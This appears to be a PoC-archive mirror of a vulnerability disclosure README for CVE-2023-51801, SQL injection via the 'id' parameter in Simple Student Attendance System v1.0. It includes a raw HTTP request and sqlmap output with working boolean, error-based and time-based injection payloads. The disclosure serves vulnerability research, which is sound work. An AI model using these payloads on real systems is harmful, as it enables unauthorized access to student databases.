Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-51801 PoC — Simple Student Attendance System 安全漏洞

Source
https://github.com/geraldoalcantara/CVE-2023-51801
Associated Vulnerability
Title:Simple Student Attendance System 安全漏洞 (CVE-2023-51801)
Description:SQL Injection vulnerability in the Simple Student Attendance System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the id parameter in the student_form.php and the class_form.php pages.
Readme
# CVE-2023-51801
# Simple Student Attendance System v.1.0 - Multiple SQL injection vulnerabilities - student_form.php and class_form.php

**Description**:Simple Student Attendance System v.1.0 is prone to multiple SQL injection vulnerabilities that can be exploited by authenticated attackers. These vulnerabilities exist in student_form.php and class_form.php, allowing for the execution of arbitrary SQL commands via the 'id' parameter.  

**Vulnerable Product Version**: Simple Student Attendance System v.1.0  
**CVE Author**: Geraldo Alcântara  
**Date**: 29/11/2023  
**Confirmed on**: 10/01/2024  
**CVE**: CVE-2023-51801  
**CVE Link**: https://www.cve.org/CVERecord?id=CVE-2023-51801  
**NVD Link**: https://nvd.nist.gov/vuln/detail/CVE-2023-51801  
**Tenable Link**: https://www.tenable.com/cve/CVE-2023-51801  
**Tested on**: Windows  
### Steps to reproduce:  
To exploit this vulnerability, an attacker is required to navigate to either the 'Student' or 'Classes' pages, where they can proceed to edit or add a student or class. The malicious payload should then be inserted into the 'id' parameter.  
**Affected Component**:  
> Components:  student_form.php and class_form.php  
> Parameter: id  
## Request:
```
POST /php-attendance/modals/class_form.php HTTP/1.1
Host: 192.168.68.182
Cookie: PHPSESSID=emhqgom5shgrtcii7p3a8ad1bo
Content-Length: 4
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.68.182
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.68.182/php-attendance/?page=class_list
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i
Connection: close

id=1'
```
## SQLMap
```
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1''' AND 4206=4206-- KDFY

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1''' OR (SELECT 1707 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1707=1707,1))),0x717a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xsae

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1''' AND (SELECT 1288 FROM (SELECT(SLEEP(5)))SVhp)-- EYkh
```
Discoverer(s)/Credits:  
Geraldo Alcântara
File Snapshot

 [4.0K]  /data/pocs/196faee8974b0741ab7c79f6ef5a01ab94bb38fc
└── [2.6K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →